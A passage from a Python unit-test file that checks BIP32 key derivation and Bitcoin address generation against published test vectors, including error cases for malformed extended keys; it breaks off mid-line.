b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(xprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n 
self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n\n xprv = bip32.derive(xprv, \"./0'\") # private relative\n self.assertEqual(xprv,\n b\"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7\")\n xprv = bip32.derive(rootxprv, \"m/0'\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw\")\n\n xprv = bip32.derive(xprv, \"./1\") # private relative\n self.assertEqual(xprv,\n b\"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs\")\n xprv = bip32.derive(rootxprv, \"m/0'/1\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs\")\n xpub = bip32.derive(xpub, \"./1\") # public relative\n self.assertEqual(xpub,\n b\"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ\")\n\n xprv = bip32.derive(xprv, \"./2H\") # private relative\n self.assertEqual(xprv,\n b\"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5\")\n\n xprv = bip32.derive(xprv, \"./2\") # private relative\n self.assertEqual(xprv,\n b\"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'/2\") # private absolute\n self.assertEqual(\n xprv, b\"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334\")\n xpub = bip32.derive(xpub, \"./2\") # public relative\n self.assertEqual(\n xpub, b\"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV\")\n\n xprv = bip32.derive(xprv, \"./1000000000\") # private relative\n self.assertEqual(\n xprv, b\"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'/2/1000000000\") # private absolute\n self.assertEqual(\n xprv, b\"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76\")\n xpub = bip32.derive(xpub, \"./1000000000\") # public relative\n self.assertEqual(\n xpub, 
b\"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy\")\n\n def test_vector2(self):\n \"\"\"BIP32 test vestor 2\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(\n rootxprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(\n rootxpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n\n xprv = bip32.derive(xprv, \"./0\") # private relative\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xprv = bip32.derive(rootxprv, \"m/0\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xpub = bip32.derive(xpub, \"./0\") # public relative\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.derive(rootxpub, \"m/0\") # public absolute\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n\n xprv = bip32.derive(xprv, \"./2147483647H\") # private relative\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xpub = bip32.xpub_from_xprv(xprv) 
def test_vector2(self):\n \"\"\"BIP32 test vector 2\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(\n rootxprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(\n rootxpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n\n xprv = bip32.derive(xprv, \"./0\") # private relative\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xprv = bip32.derive(rootxprv, \"m/0\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xpub = bip32.derive(xpub, \"./0\") # public relative\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.derive(rootxpub, \"m/0\") # public absolute\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n\n xprv = bip32.derive(xprv, \"./2147483647H\") # private relative\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a\")\n\n xprv = bip32.derive(xprv, \"./1\") # private relative\n self.assertEqual(\n xprv, b\"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef\")\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef\")\n xpub = bip32.derive(xpub, \"./1\") # public relative\n self.assertEqual(\n xpub, b\"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon\")\n\n xprv = bip32.derive(xprv, \"./2147483646H\") # private relative\n self.assertEqual(\n xprv, b\"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc\")\n # private absolute\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1/2147483646H\")\n self.assertEqual(\n xprv, b\"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL\")\n\n xprv = bip32.derive(xprv, \"./2\") # private relative\n self.assertEqual(\n xprv, b\"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j\")\n # private absolute\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1/2147483646H/2\")\n self.assertEqual(\n xprv, b\"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j\")\n xpub = bip32.derive(xpub, \"./2\") # public relative\n self.assertEqual(\n xpub, b\"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt\")\n\n def test_vector3(self):\n \"\"\"BIP32 test vector 3\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(\n rootxprv, b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(\n rootxpub, b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(\n xprv, 
b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n\n xprv = bip32.derive(xprv, \"./0'\") # private relative\n self.assertEqual(\n xprv, b\"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L\")\n xprv = bip32.derive(rootxprv, \"m/0'\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y\")\n\n def test_bip39_vectors(self):\n \"\"\"BIP32 test vectors from BIP39\n https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki\n \"\"\"\n filename = \"bip39_test_vectors.json\"\n path_to_filename = os.path.join(os.path.dirname(__file__),\n \"./data/\",\n filename)\n with open(path_to_filename, 'r') as f:\n test_vectors = json.load(f)[\"english\"]\n f.closed\n xkey_version = bip32.PRV_VERSION[0]\n for test_vector in test_vectors:\n seed = test_vector[2]\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv.decode(), test_vector[3])\n\n def test_version(self):\n pass\n\n def test_mainnet(self):\n # bitcoin core derivation style\n rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'\n\n # m/0'/0'/463'\n addr1 = b'1DyfBWxhVLmrJ7keyiHeMbt7N3UdeGU4G5'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 463]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr1)\n path = \"m/0'/0'/463'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr1)\n\n # m/0'/0'/267'\n addr2 = b'11x2mn59Qy43DjisZWQGRResjyQmgthki'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 267]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr2)\n path = \"m/0'/0'/267'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr2)\n\n xkey_version = bip32.PRV_VERSION[0]\n seed = \"bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad\"\n seed = bytes.fromhex(seed)\n xprv = bip32.rootxprv_from_seed(seed, xkey_version)\n xpub = b'xpub661MyMwAqRbcFMYjmw8C6dJV97a4oLss6hb3v9wTQn2X48msQB61RCaLGtNhzgPCWPaJu7SvuB9EBSFCL43kTaFJC3owdaMka85uS154cEh'\n self.assertEqual(bip32.xpub_from_xprv(xprv), xpub)\n\n ind = [0, 0]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1FcfDbWwGs1PmyhMVpCAhoTfMnmSuptH6g')\n\n ind = [0, 1]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1K5GjYkZnPFvMDTGaQHTrVnd8wjmrtfR5x')\n\n ind = [0, 2]\n addr = 
bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1PQYX2uN7NYFd7Hq22ECMzfDcKhtrHmkfi')\n\n ind = [1, 0]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1BvSYpojWoWUeaMLnzbkK55v42DbizCoyq')\n\n ind = [1, 1]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1NXB59hF4QzYpFrB7o6usLBjbk2D3ZqxAL')\n\n ind = [1, 2]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'16NLYkKtvYhW1Jp86tbocku3gxWcvitY1w')\n\n # version/key mismatch in extended parent key\n temp = base58.decode_check(rootxprv)\n bad_xprv = base58.encode_check(temp[0:45] + b'\\x01' + temp[46:])\n self.assertRaises(ValueError, bip32.ckd, bad_xprv, 1)\n #bip32.ckd(bad_xprv, 1)\n\n # version/key mismatch in extended parent key\n xpub = bip32.xpub_from_xprv(rootxprv)\n temp = base58.decode_check(xpub)\n bad_xpub = base58.encode_check(temp[0:45] + b'\\x00' + temp[46:])\n self.assertRaises(ValueError, bip32.ckd, bad_xpub, 1)\n #bip32.ckd(bad_xpub, 1)\n\n # no private/hardened derivation from pubkey\n self.assertRaises(ValueError, bip32.ckd, xpub, 0x80000000)\n #bip32.ckd(xpub, 0x80000000)\n\n def test_testnet(self):\n # bitcoin core derivation style\n rootxprv = b'tprv8ZgxMBicQKsPe3g3HwF9xxTLiyc5tNyEtjhBBAk29YA3MTQUqULrmg7aj9qTKNfieuu2HryQ6tGVHse9x7ANFGs3f4HgypMc5nSSoxwf7TK'\n\n # m/0'/0'/51'\n addr1 = b'mfXYCCsvWPgeCv8ZYGqcubpNLYy5nYHbbj'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 51]\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr1)\n path = \"m/0'/0'/51'\"\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr1)\n\n # m/0'/1'/150'\n addr2 = b'mfaUnRFxVvf55uD1P3zWXpprN1EJcKcGrb'\n indexes = [0x80000000, 0x80000000 + 1, 0x80000000 + 150]\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr2)\n path = \"m/0'/1'/150'\"\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr2)\n\n def test_altnet(self):\n # non-bitcoin address version\n addr_version = 0x46.to_bytes(1, 'big')\n\n rootxprv 